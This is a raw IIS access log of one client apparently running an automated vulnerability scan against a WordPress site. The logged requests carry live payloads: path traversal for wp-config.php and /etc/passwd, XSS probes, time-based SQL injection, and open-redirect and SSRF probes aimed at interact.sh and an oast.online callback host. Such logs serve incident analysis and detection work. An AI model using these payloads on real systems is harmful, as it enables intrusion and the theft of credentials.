Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 210 2023-10-15 20:55:46 103.153.214.94 GET /cgi-bin/ALFA_DATA/alfacgiapi/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 200 2023-10-15 20:55:51 103.153.214.94 GET /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php file=../../../wp-config.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 201 2023-10-15 20:55:56 103.153.214.94 GET /wp-content/plugins/aspose-importer-exporter/aspose_import_export_download file=../../../wp-config.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 204 2023-10-15 20:57:33 103.153.214.94 GET /wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php file=../../../wp-config.php 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 209 2023-10-15 20:58:39 103.153.214.94 GET /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php file=../../../wp-config.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 213 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-10-15 21:01:20 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-10-15 21:01:20 103.153.214.94 GET /wp-content/themes/Attitude/go.php https://interact.sh/ 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 646 2023-10-15 21:05:05 103.153.214.94 GET /wp-content/plugins/avchat-3/index_popup.php movie_param=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&FB_appId=FB_appId%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 208 2023-10-15 21:08:08 103.153.214.94 POST /wp-admin/admin-post.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 204 2023-10-15 21:08:24 103.153.214.94 GET /wp-content/plugins/brandfolder/callback.php wp_abspath=../../../wp-config.php%00 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 203 2023-10-15 21:09:28 103.153.214.94 GET /wp-content/plugins/brandfolder/callback.php wp_abspath=https://interact.sh/ 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 203 2023-10-15 21:10:38 103.153.214.94 GET /wp-content/plugins/athlon-manage-calameo-publications/thickbox_content.php attachment_id=id%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%26 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 1053 2023-10-15 21:13:13 103.153.214.94 GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php file=../../../../../wp-config.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 205 2023-10-15 21:14:48 103.153.214.94 GET /wp-content/themes/churchope/lib/downloadlink.php file=../../../../wp-config.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 206 2023-10-15 21:14:48 103.153.214.94 GET /wp-content/plugins/church-admin/display/download.php key=../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 203 2023-10-15 21:16:36 103.153.214.94 POST /wp-admin/admin-ajax.php image_id=123 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 212 2023-10-15 21:18:11 103.153.214.94 GET /wp-content/themes/diarise/download.php calendar=file:///etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 209 2023-10-15 21:18:33 103.153.214.94 GET /wp-content/themes/eatery/nav.php -Menu-=https://interact.sh/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 578 2023-10-15 21:20:32 103.153.214.94 GET /wp-admin/admin-ajax.php action=fetch_posts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 206 2023-10-15 21:21:27 103.153.214.94 GET /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php file_path=../../../../wp-config.php&file_size=10 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 205 2023-10-15 21:24:43 103.153.214.94 GET /wp-content/plugins/wp-hide-security-enhancer/router/file-process.php action=style-clean&file_path=/wp-config.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 208 2023-10-15 21:26:55 103.153.214.94 GET /wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php abspath=%2Fetc%2Fpasswd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 207 2023-10-15 21:29:09 103.153.214.94 GET / season=1&league_id=1season=1&league_id=1'+AND+(SELECT+1909+FROM+(SELECT(SLEEP(6)))ZiBf)--+qODp&match_day=1&match_day=1&team_id=1&team_id=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 209 2023-10-15 21:29:24 103.153.214.94 GET /wp-content/plugins/members-list/admin/view/user.php page=%22%3E%3Cimg%20src%20onerror=alert(document.domain)%20x 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 582 2023-10-15 21:31:35 103.153.214.94 GET /wp-content/themes/mTheme-Unus/css/css.php files=../../../../wp-config.php 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 202 2023-10-15 21:32:47 103.153.214.94 GET /wp-content/plugins/music-store/ms-core/ms-submit.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://interact.sh 200 0 0 206 2023-10-15 21:36:22 103.153.214.94 GET /wp-content/themes/NativeChurch/download/download.php file=../../../../wp-config.php 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 209 2023-10-15 21:37:19 103.153.214.94 GET / wp_nlm=confirmation&appurl=aHR0cDovL2ludGVyYWN0LnNo 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 211 2023-10-15 21:38:43 103.153.214.94 GET /wp-json/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 212 2023-10-15 21:38:45 103.153.214.94 GET /wp-json/notificationx/v1/notification/1 api_key=0afd1aba016d54f5435932c99fe44d6b&id[1]=%3d(SELECT/**/1/**/WHERE/**/SLEEP(6)) 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 205 2023-10-15 21:39:19 103.153.214.94 GET / piereg_logout_url=true&redirect_to=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 615 2023-10-15 21:40:17 103.153.214.94 GET /wp-admin/admin-ajax.php action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E] 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 207 2023-10-15 21:42:29 103.153.214.94 GET /wp-content/force-download.php file=../wp-config.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 206 2023-10-15 21:46:33 103.153.214.94 GET /register/ redirect_to=https://interact.sh/ 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 206 2023-10-15 21:47:33 103.153.214.94 GET /wp-content/backups-dup-lite/tmp/ - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 210 2023-10-15 21:47:37 103.153.214.94 GET /wp-content/backups-dup-lite - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 208 2023-10-15 21:48:44 103.153.214.94 GET /wp-content/plugins/w3-total-cache/pub/minify.php file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 213 2023-10-15 21:50:06 103.153.214.94 GET /wp-content/themes/weekender/friend.php id=aHR0cHM6Ly9pbnRlcmFjdC5zaA== 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 212 2023-10-15 21:53:17 103.153.214.94 GET /wp-content/uploads/affwp-debug.log - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 206 2023-10-15 21:53:26 103.153.214.94 GET /wp-content/uploads/database-backups/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 206 2023-10-15 21:53:54 103.153.214.94 GET /wp-content/backup-db/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 202 2023-10-15 21:54:56 103.153.214.94 GET /wp-admin/maint/repair.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 212 2023-10-15 21:56:25 103.153.214.94 GET /wp-content/debug.log - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 206 2023-10-15 21:58:19 103.153.214.94 POST /wp-content/plugins/simple-file-list/ee-upload-engine.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 207 2023-10-15 21:58:21 103.153.214.94 POST /wp-content/plugins/simple-file-list/ee-file-engine.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 202 2023-10-15 21:58:21 103.153.214.94 GET /wp-admin/admin-ajax.php page=social-metrics-tracker-export&smt_download_export_file=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 200 2023-10-15 21:58:23 103.153.214.94 GET /wp-content/uploads/simple-file-list/bchecbh.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 202 2023-10-15 21:58:37 103.153.214.94 GET /wp-json/oembed/1.0/proxy url=http://ckjv7uic8b6p3donsoogg3krq9c4pq7u1.oast.online/ 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 207 2023-10-15 22:00:22 103.153.214.94 GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 208 2023-10-15 22:00:41 103.153.214.94 GET /wp-content/plugins/wordfence/lib/wordfenceClass.php file=/../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 203 2023-10-15 22:02:00 103.153.214.94 GET /wp-content/plugins/wordfence/lib/diffResult.php file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 202 2023-10-15 22:02:03 103.153.214.94 GET / s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 206 2023-10-15 22:03:46 103.153.214.94 POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php form=%3C/script%3E%3Cimg%20src%20onerror=alert(document.domain)%3E&control=upload 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 209 2023-10-15 22:06:54 103.153.214.94 GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/<img/src/onerror=alert(document.domain)>/ debug=true 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 213 2023-10-15 22:07:27 103.153.214.94 GET /wp-config.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 201 2023-10-15 22:07:29 103.153.214.94 GET /.wp-config.php.swp - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 207 2023-10-15 22:07:31 103.153.214.94 GET /wp-config-sample.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 201 2023-10-15 22:07:32 103.153.214.94 GET /wp-config.inc - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 202 2023-10-15 22:07:33 103.153.214.94 GET /wp-config.old - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 200 2023-10-15 22:07:33 103.153.214.94 GET /wp-config.txt - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 200 2023-10-15 22:07:36 103.153.214.94 GET /wp-config.php.txt - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 202 2023-10-15 22:07:37 103.153.214.94 GET /wp-config.php.bak - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 203 2023-10-15 22:07:37 103.153.214.94 GET /wp-config.php.old - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 203 2023-10-15 22:07:39 103.153.214.94 GET /wp-config.php.dist - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 201 2023-10-15 22:07:39 103.153.214.94 GET /wp-config.php.inc - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 200 2023-10-15 22:07:41 103.153.214.94 GET /wp-config.php.swp - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 202 2023-10-15 22:07:42 103.153.214.94 GET /wp-config.php.html - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 200 2023-10-15 22:07:42 103.153.214.94 GET /wp-config-backup.txt - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 205 2023-10-15 22:07:44 103.153.214.94 GET /wp-config.php.save - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 215 2023-10-15 22:07:45 103.153.214.94 GET /wp-config.php~ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 200 2023-10-15 22:07:47 103.153.214.94 GET /wp-config.php-backup - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 210 2023-10-15 22:07:49 103.153.214.94 GET /wp-config.php.orig - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 200 2023-10-15 22:07:51 103.153.214.94 GET /wp-config.php_orig - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 200 2023-10-15 22:07:53 103.153.214.94 GET /wp-config.php.original - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 201 2023-10-15 22:07:55 103.153.214.94 GET /wp-config.backup - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 201 2023-10-15 22:07:57 103.153.214.94 GET /_wpeprivate/config.json - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 202 2023-10-15 22:09:38 103.153.214.94 GET /wp-content/themes/ambience/thumb.php src=%3Cbody%20onload%3Dalert(1)%3E.jpg 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 205 2023-10-15 22:12:39 103.153.214.94 GET /wp-content/plugins/wp-autosuggest/autosuggest.php wpas_action=query&wpas_keys=1%27%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F5202%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%286%29%29%29yRVR%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%27dwQZ%27%2F%2A%2A%2FLIKE%2F%2A%2A%2F%27dwQZ 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 205 2023-10-15 22:12:41 103.153.214.94 GET /wp-content/plugins/blogroll-fun/blogroll.php k=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 200 2023-10-15 22:13:29 103.153.214.94 GET /wp-admin/setup-config.php step=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 201 2023-10-15 22:14:19 103.153.214.94 GET /wp-content/plugins/custom-tables/iframe.php s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 204 2023-10-15 22:15:52 103.153.214.94 GET /wp-content/plugins/email-subscribers - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 204 2023-10-15 22:15:53 103.153.214.94 GET /wp-content/plugins/finder/index.php by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 203 2023-10-15 22:17:34 103.153.214.94 GET /wp-content/plugins/FlagEm/flagit.php cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 207 2023-10-15 22:17:50 103.153.214.94 GET /wp-content/themes/Grimag/go.php https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 203 2023-10-15 22:18:55 103.153.214.94 GET /wp-content/plugins/gtranslate/url_addon/gtranslate.php glang=en&gurl=/www.pluginvulnerabilities.com 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 208 2023-10-15 22:20:26 103.153.214.94 GET /wp-content/themes/haberadam/api/mobile-info.php id 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 208 2023-10-15 22:20:28 103.153.214.94 GET /blog/wp-content/themes/haberadam/api/mobile-info.php id 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 205 2023-10-15 22:20:42 103.153.214.94 GET /wp-admin/admin-ajax.php jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 202 2023-10-15 22:21:16 103.153.214.94 GET /wp-content/plugins/knews/wysiwyg/fontpicker/ ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 202 2023-10-15 22:23:12 103.153.214.94 GET /wp-content/uploads/mc4wp-debug.log - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 208 2023-10-15 22:24:02 103.153.214.94 GET /mdocs-posts/ mdocs-img-preview=../../../wp-config.php 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 207 2023-10-15 22:24:04 103.153.214.94 GET / mdocs-img-preview=../../../wp-config.php 443 - 193.123.37.162 